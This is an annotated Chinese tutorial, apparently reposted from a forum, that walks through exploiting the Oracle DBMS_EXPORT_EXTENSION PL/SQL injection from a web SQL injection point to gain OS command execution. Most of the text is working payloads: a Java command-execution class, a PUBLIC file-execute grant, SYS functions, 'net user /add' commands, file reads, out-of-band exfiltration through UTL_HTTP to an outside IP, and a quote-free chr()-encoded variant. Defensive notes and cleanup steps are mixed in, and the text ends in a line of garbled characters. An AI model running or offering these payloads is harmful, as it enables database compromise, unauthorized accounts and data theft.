
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时, 把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(用 "'a'||" 是为了让语句返回 true 值: Oracle 把 NULL 拼接当作空串, 所以只要子查询不报错, 外层条件就恒为真; 子查询报错则整个 SQL 出错、页面表现不同, 由此盲判注入语句是否执行。)
语句有点长, 可能要用 POST 提交。
背景说明: SYS.DBMS_EXPORT_EXTENSION 是以定义者(SYS)权限运行、且默认授予 PUBLIC 执行权限的包, GET_DOMAIN_INDEX_TABLES 把第三个参数(TYPE_NAME)直接拼进动态 SQL, 因此 payload 用开头的 " 闭合引号标识符、用末尾的 -- 注释掉拼接出来的剩余语句。这个 PL/SQL 注入漏洞 Oracle 已在 2006 年的 Critical Patch Update 中修复, 只在未打相应补丁的版本上可用; 防御方应安装 CPU, 并考虑回收 PUBLIC 对该包的 EXECUTE 权限。
以下是各个步骤:
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数, 在 Oracle 上创建 Java 类 LinxUtil, 里面两个方法: runCMD 用于执行系统命令(Runtime.exec, 以数据库服务进程所属的操作系统用户身份运行, 只收集 stdout), readFile 用于读取文件。注意这一步要求数据库安装了 Oracle JVM 组件, 否则 create java source 会失败; 两个方法出错时都不抛异常, 而是把 e.toString() 当作结果返回, 所以调用方看到的"输出"也可能是错误文本。
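-- Step 1 payload: create the Java class LinxUtil through the
-- DBMS_EXPORT_EXTENSION PL/SQL injection. The first line is the URL
-- wrapper used at the injection point, not SQL; the 'a'|| makes the outer
-- comparison true whatever the function returns (NULL concatenates as ''),
-- so the only observable signal is whether the injected DDL raised.
-- Quote nesting: '' is one quote inside the outer literal, '''' one quote
-- inside the EXECUTE IMMEDIATE string. The dynamic SQL runs under SYS, so
-- the Java source is created in the SYS schema.
-- runCMD: runs args with Runtime.exec (no shell, hence "cmd /c" later) and
-- returns stdout with lines joined by "\n"; stderr is not read. readFile:
-- returns the file's lines joined the same way. Both return e.toString()
-- instead of raising, so an error message looks like ordinary output.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)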
------------------------
如果 URL 有长度限制, 可以把 readFile() 方法去掉, 只保留 runCMD, 即:
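-- Step 1 payload, short variant for length-limited URLs: same as above but
-- LinxUtil only has runCMD (no readFile). If this variant is used, the
-- LinxReadFile function, its grant and its calls in later steps must be
-- dropped as well. The first line is the URL wrapper, not SQL.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)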
同时把后面步骤提到的对 readFile() 的处理语句(创建 LinxReadFile、给它授权、调用它)去掉。
------------------------------
2. 赋 Java 权限
Oracle JVM 默认不允许存储过程里的 Java 代码执行外部程序。下面这条语句给 PUBLIC(即所有数据库账号)授予对 <<ALL FILES>> 的 java.io.FilePermission execute 权限, 也就是执行主机上任意文件的权限。防御方注意: 这类授权记录在 Java 策略视图(如 DBA_JAVA_POLICY)中, 对 PUBLIC 的此类授权应视为入侵迹象。
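-- Step 2: grant PUBLIC (every database account) java.io.FilePermission
-- "execute" on <<ALL FILES>>, the permission the Oracle JVM checks before
-- letting LinxUtil.runCMD call Runtime.exec. Quote nesting: '''''''' is one
-- quote three levels down (outer literal -> EXECUTE IMMEDIATE -> inner
-- EXECUTE IMMEDIATE -> the begin..end block). Defenders: the grant shows up
-- in the Java policy views (DBA_JAVA_POLICY); a PUBLIC grant of this kind
-- should be treated as a compromise indicator.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual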
3. 创建函数(把 Java 方法映射为 PL/SQL 函数。动态 SQL 以 SYS 身份执行, 所以函数建在 SYS 模式下, 后面要写成 sys.LinxRunCMD 来调用)
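-- Step 3a: publish LinxUtil.runCMD as the PL/SQL function LinxRunCMD
-- (created in the SYS schema, since the dynamic SQL runs as SYS).
-- The return type is VARCHAR2: when called from SQL the result is bound by
-- the SQL VARCHAR2 limit (4000 bytes before 12c), so long command output
-- errors or is cut off instead of being returned.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual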
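-- Step 3b: publish LinxUtil.readFile as the PL/SQL function LinxReadFile.
-- Skip this statement when the short (runCMD-only) LinxUtil was created.
-- Same VARCHAR2 size caveat as LinxRunCMD: large files cannot be returned
-- in one call.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual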
4. 赋 public 执行函数的权限
两个函数建在 SYS 下, 注入点使用的应用账号默认调用不了, 所以把它们授权给 PUBLIC。此后任何能登录该数据库的账号都能以数据库服务进程的操作系统用户身份执行命令, 影响范围远超注入点本身。
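-- Step 4: grant all object privileges on the two SYS-owned functions to
-- PUBLIC so the unprivileged web application account can call
-- sys.LinxRunCMD / sys.LinxReadFile from an injected SELECT. After this,
-- every account that can connect can run OS commands as the database's OS
-- user. Two separate statements: each EXECUTE IMMEDIATE runs exactly one.
-- Drop the second one when LinxReadFile was not created.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual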
5. 测试上面的几步是否成功
原理: 对象存在时子查询返回 OBJECT_ID, 不存在时返回 NULL, 与 NULL 比较的结果是 UNKNOWN, 页面表现如同条件为假。注意: 写成 '1'<>'11'||(子查询) 是测不出来的——Oracle 把 NULL 拼接当作空串, '1'<>'11' 恒为真; 两个检查都应该用 '1'<>(子查询) 的写法。另外未加引号创建的对象名会转成大写, 所以查的是 'LINXRUNCMD'; all_objects 只列出当前用户有权访问的对象, 因此要在第 4 步授权之后再测。
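-- Step 5 checks, appended to the injected query. If the function exists the
-- subquery returns its OBJECT_ID and the condition is true; if not it
-- returns NULL, the comparison is UNKNOWN and the page behaves as if false.
-- Fix vs. the original: the first check was written as
-- '1'<>'11'||(subquery); Oracle concatenates NULL as '' so that test is
-- always true and proves nothing. Both now use the plain '1'<>(subquery).
-- Names are upper case because the functions were created unquoted, and
-- all_objects only shows objects the current user can access, so run this
-- after the PUBLIC grants of step 4.
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)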
6. 执行命令:
命令以 Oracle 数据库服务进程所属的操作系统账号运行(Windows 上常见为 LocalSystem 或专用服务账号, Unix 上通常是 oracle 用户), 下面的 net user /add 能否成功取决于该账号是否有管理员权限。Runtime.exec 不经过 shell, 所以要带 cmd /c。runCMD 出错时返回的是异常文本而不是抛异常, 因此下面的条件判断只说明函数被调用了, 不能证明命令执行成功; 要看结果需用后面的 union 或 UTL_HTTP 方式。
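-- Step 6: run an OS command / read a file through the SYS-owned functions.
-- The first line of each pair is the URL wrapper, not SQL. The function's
-- return value is only used in a truth test here: an empty result is NULL
-- in Oracle and makes the condition false, while an error string (the
-- functions return e.toString() instead of raising) makes it true, so
-- "page looks normal" does not prove the command succeeded.
-- The command runs as the database server's OS account; net user /add
-- needs that account to have local administrator rights.
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)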

注意 sys.LinxReadFile() 返回的是 varchar 类型, 不能用 "and 1<>" 代替 "and '1'<>"。另外从 SQL 中调用返回 VARCHAR2 的函数时, 结果受 SQL 的 VARCHAR2 长度上限(12c 以前为 4000 字节)限制, 命令输出或文件内容过长时会报错, 此时应换更短的命令或分段读取。
如果要查看运行结果可以用 union(union 两边的列数和列类型必须与原查询一致, 否则报 ORA-01789, 需要先探测出原查询的列数/类型; 输出所在的列还必须是页面会显示的列):
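-- In-band result retrieval: UNION the command output into the page. The
-- injected SELECT must return the same number of columns, with compatible
-- types, as the original query (otherwise ORA-01789), and the column that
-- carries the output must be one the page actually renders. The part
-- before "union" is the URL wrapper, not SQL.
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual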
或者用 UTL_HTTP.request 把结果带外发送到自己控制的服务器(下面示例里的 211.71.147.3 是原作者的接收端, 要换成自己的。数据库服务器必须能直接访问该地址, 这类出站请求会留在防火墙/代理日志里; 从 11g 起 UTL_HTTP 受网络 ACL 限制, 未配置 ACL 会报 ORA-24247):
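-- Out-of-band result retrieval: the output is sent as a query string to an
-- attacker-controlled host (211.71.147.3 in the original post; replace with
-- your own receiver). The first line of each pair is the URL wrapper.
-- Fix vs. the original: Oracle string literals have no backslash escapes,
-- so REPLACE(..., '\n', '%0A') matched the two characters backslash+n and
-- left real newlines in place, which is exactly what breaks the request.
-- LinxUtil joins lines with "\n" only (readLine() strips the terminator),
-- so replacing chr(10) is sufficient; chr(13) never appears.
-- Spaces are replaced because the request argument is not URL-encoded by
-- UTL_HTTP.request; other reserved characters in the output (&, #, %, +)
-- are still passed raw, so UTL_URL.ESCAPE or base64 is the robust option.
-- From 11g the call also needs a network ACL for the target (ORA-24247).
-- Note the second request reuses the "LinxRunCMD:" label for readFile
-- output, which is only a labelling inconsistency on the receiver side.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)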
注意: 用 UTL_HTTP.request 时, 要用 REPLACE() 把空格、换行符替换掉, 否则无法提交 HTTP request。但 Oracle 的字符串字面量不解释反斜杠转义, '\n' 是反斜杠加 n 两个字符而不是换行, 要写成 REPLACE(..., chr(10), '%0A')(LinxUtil 用 readLine() 拼接, 行尾只有 LF, 不必再处理 chr(13))。输出里的 &、#、%、+ 等字符同样会破坏 URL, 若版本支持可以用 UTL_URL.ESCAPE, 或者用 utl_encode.base64_encode 整体编码(它的参数和返回值都是 RAW, 需配合 utl_raw.cast_to_raw / utl_raw.cast_to_varchar2 使用)。
--------------------
6. 内部变化
通过以下命令可以查看 all_objects 表的改变(未加引号创建的函数名被转成大写, 由 '%LINX%' 匹配; Java source 用的是带引号、保留大小写的 "LinxUtil", 由 '%Linx%' 匹配):
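-- Post-check: list the objects created above. Unquoted names are folded to
-- upper case, so '%LINX%' matches LINXRUNCMD / LINXREADFILE; the Java
-- source was created with a quoted, case-preserving name, which '%Linx%'
-- matches. all_objects only lists objects the current user can access.
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'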
7. 删除我们创建的函数
原文只删了 LinxRunCMD。完整清理还要删除 LinxReadFile、Java source "LinxUtil"(并确认由它编译出的 class 也一起没了), 并用 dbms_java.revoke_permission 回收第 2 步给 PUBLIC 的 FilePermission; 第 4 步的对象授权会随函数删除而消失。每条 EXECUTE IMMEDIATE 只能执行一条语句, 所以每个对象要单独注入一次。
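-- Step 7: remove what steps 1-4 created. The original post only dropped
-- LinxRunCMD and left LinxReadFile, the Java source "LinxUtil" and the
-- PUBLIC java.io.FilePermission grant from step 2 in place. Each EXECUTE
-- IMMEDIATE runs one statement, so one injection per object; run them
-- separately. Dropping a function also removes the object grants made on
-- it in step 4. After the DROP JAVA SOURCE, re-run the all_objects query
-- above to confirm the derived class object is gone as well.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil"  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual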
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号(注意这会在 DBA_USERS / ALL_USERS 里留下明显痕迹, 开了审计的话还有 CREATE USER 记录, 比第 5 步查 all_objects 的做法更容易被发现):
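-- Alternative vulnerability test: create a database user through the same
-- injection. Unlike the all_objects probe this leaves an obvious artifact
-- (a new row in ALL_USERS / DBA_USERS, plus an audit record if auditing
-- is enabled). The user name is stored upper-cased (LINXSQL) because it
-- is unquoted.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual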
即(同一条语句的 chr() 编码形式, 适用于引号被过滤或转义的场景; 注意它解码后是 DBMS_OUTPUT".PUT(:P1), 而上面的明文写法用的是 PUT(1)):
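-- Same CREATE USER payload with every literal spelled as chr() concatenation,
-- so the injected text contains no quote characters (for inputs where quotes
-- are escaped or stripped). chr(70)||chr(79)||chr(79) is 'FOO',
-- chr(66)||chr(65)||chr(82) is 'BAR', chr(83)||chr(89)||chr(83) is 'SYS'
-- and chr(49) is '1'. The long third argument decodes to:
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;
--   BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
-- i.e. the PUT(:P1) variant, whereas the quoted form above uses PUT(1).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual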
确定漏洞存在(用户已创建则子查询返回 user_id, 条件为真; 否则返回 NULL, 条件为 UNKNOWN, 页面表现如同为假):
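-- Confirm the user exists. ALL_USERS lists every user, so no grant is
-- needed for the probe; the name is upper case because CREATE USER linxsql
-- was unquoted. If the row is absent the subquery yields NULL and the
-- condition is UNKNOWN (treated as false by the page).
1<>(
select user_id from all_users where username='LINXSQL'
)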
给 linxsql 连接权限(授予 CONNECT 角色; 从 10gR2 起该角色只包含 CREATE SESSION):
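-- Give the new user the CONNECT role so it can log in (from 10gR2 the role
-- holds only CREATE SESSION). Without this the CREATE USER above is
-- inert, which is why the cheaper ALL_USERS probe is preferred as a test.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual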
删除帐号(该用户若仍有会话连接, DROP USER 会报 ORA-01940, 要先断开; 这一条用的是 PUT(:P1) 写法):
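-- Clean up the test user. This uses the PUT(:P1) form of the payload (the
-- earlier statements use PUT(1)). DROP USER fails with ORA-01940 while the
-- user still has an open session.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual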
======================
以下方法创建一个可以执行任意单条语句的函数 Linx_query(), 执行成功的话返回数值 "1"。但它带 authid current_user, 即 execute immediate 以调用者(而不是定义者 SYS)的权限执行, 所以拿到的可能仅仅是 public 权限, 作用似乎不大; 真的要用的话可以考虑 grant dba to 当前的 User。另外它没有 PRAGMA AUTONOMOUS_TRANSACTION, 从 SELECT 里调用它执行 DDL/DML 会报 ORA-14552, 这也是前面注入语句里都带该 pragma 的原因:
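-- Linx_query: a SYS-schema helper that runs any single statement passed to
-- it and returns 1. AUTHID CURRENT_USER makes EXECUTE IMMEDIATE run with
-- the caller's privileges, not SYS's, which is why the original post finds
-- it of little use. It also has no PRAGMA AUTONOMOUS_TRANSACTION, so
-- calling it from a SELECT with DDL or DML is expected to fail with
-- ORA-14552. The first line is the URL wrapper, not SQL.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
-- The original post trails off here with a truncated, unusable repeat of
-- the statement above (missing the closing quote after DBMS_OUTPUT); omitted.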
! l6 Y0 u( o, }4 h" E: C
  ?! {( A" a8 S9 r; c/ a7 v8 _" {4 |! A2 N
: c5 w. E7 l. A( X+ H& f; b